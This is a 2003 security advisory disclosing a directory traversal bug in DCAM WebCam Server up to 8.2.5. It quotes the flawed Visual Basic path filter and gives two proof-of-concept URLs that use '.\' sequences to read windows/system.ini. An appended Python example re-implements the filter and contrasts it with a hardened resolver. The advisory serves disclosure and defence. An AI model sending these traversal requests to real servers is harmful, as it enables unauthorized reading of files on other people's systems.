#######################################################################

                             Luigi Auriemma

Application:  DCAM WebCam server
              http://www.hyperionx.com
              http://sourceforge.net/projects/dcamserver/
Versions:     <= 8.2.5
Platforms:    Windows
Bug:          Directory traversal bug
Risk:         high
Exploitation: remote with browser
Date:         22 Dec 2003
Author:       Luigi Auriemma
              e-mail: aluigi@altervista.org
              web:    http://aluigi.altervista.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

DCAM WebCam Server is an open-source program written in Visual Basic
that captures live streaming video and broadcasts it on the web through
its built-in web server.

#######################################################################

======
2) Bug
======

The web server built into DCAM tries to protect itself against directory
traversal by stripping dangerous substrings from the requested path. The
check is in Form1.frm:

...
880 page = Replace(page, "..", "")
881 page = Replace(page, "./", "")
882 page = Replace(page, "/.", "")
883 page = Replace(page, "//", "")
884 page = Replace(page, "\", "")
...

Each Replace() is a single, non-repeated pass, and the backslash is
removed last, after the ".." check has already run. A request containing
the pattern ".\" therefore survives lines 880-883 untouched, and line 884
then turns ".\.\" into "..", producing exactly the parent-directory
reference the filter was meant to remove. An attacker who knows the path
can use this to read and download any file on the remote system.

#######################################################################

===========
3) The Code
===========

http://server/.\.\.\.\/windows/system.ini
http://server/.\.\.\.\.\.\.\.\.\.\/windows/system.ini

#######################################################################

======
4) Fix
======

Version 8.2.6

#######################################################################

---
Luigi Auriemma
http://aluigi.altervista.org
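The following Python is an added example, not code from the DCAM project or from the original advisory. It re-implements the five Replace() calls from Form1.frm with str.replace() (which, like VB's Replace(), does one non-overlapping left-to-right pass), shows where a bypassing request ends up relative to an assumed web root C:\dcam\www (a hypothetical path; the advisory does not name DCAM's document directory), and contrasts it with a resolver that normalises the path first and then checks containment. The example uses the two-repetition form ".\.\", which the filter reduces to a plain ".."; the advisory's own URLs use longer runs, which the filter reduces to "...." and similar, and rely on how the Windows file API treats such components.

```python
import ntpath

# Assumed web root for the demonstration (hypothetical; DCAM's real
# document directory is not stated in the advisory).
WEBROOT = r"C:\dcam\www"


def dcam_filter(page: str) -> str:
    """Re-implementation of the sanitiser from Form1.frm lines 880-884.

    VB's Replace() and Python's str.replace() both do a single,
    non-overlapping, left-to-right pass, so the order matters: the
    backslash is stripped LAST, after the ".." check has already run,
    and the sequence is never repeated.
    """
    for needle in ("..", "./", "/.", "//", "\\"):
        page = page.replace(needle, "")
    return page


def resolve_vulnerable(page: str, root: str = WEBROOT) -> str:
    """Path the original filter would hand to the file system."""
    cleaned = dcam_filter(page).lstrip("/\\")
    return ntpath.normpath(ntpath.join(root, cleaned))


def is_under_root(path: str, root: str = WEBROOT) -> bool:
    """True if the normalised path is the root or lies inside it."""
    root = ntpath.normpath(root)
    return path == root or path.startswith(root + ntpath.sep)


def resolve_hardened(page: str, root: str = WEBROOT):
    """Normalise first, then check containment; None means reject.

    This is the added example's fix, not the vendor's 8.2.6 change.
    """
    root = ntpath.normpath(root)
    candidate = ntpath.normpath(ntpath.join(root, page.lstrip("/\\")))
    if not is_under_root(candidate, root):
        return None  # escaped the web root
    # Windows strips trailing dots and spaces from path components, so a
    # component such as "...." is not what it looks like once the OS
    # rewrites it; refuse anything the OS would alter.
    tail = candidate[len(root):].split(ntpath.sep)
    if any(part != part.rstrip(". ") for part in tail):
        return None
    return candidate


if __name__ == "__main__":
    for req in (".\\.\\/windows/system.ini",
                ".\\.\\.\\.\\/windows/system.ini",
                "../windows/system.ini",
                "index.html"):
        print(f"{req!r:38} filter     -> {dcam_filter(req)!r}")
        print(f"{'':38} vulnerable -> {resolve_vulnerable(req)}")
        print(f"{'':38} hardened   -> {resolve_hardened(req)}")
```

Running the block shows the naive `../windows/system.ini` being neutralised by the filter, while `.\.\/windows/system.ini` comes out of the same filter as `../windows/system.ini` and resolves to `C:\dcam\windows\system.ini`, outside the web root. The hardened resolver rejects both that input and the advisory's dotted form, and only serves paths that normalise to somewhere beneath the root.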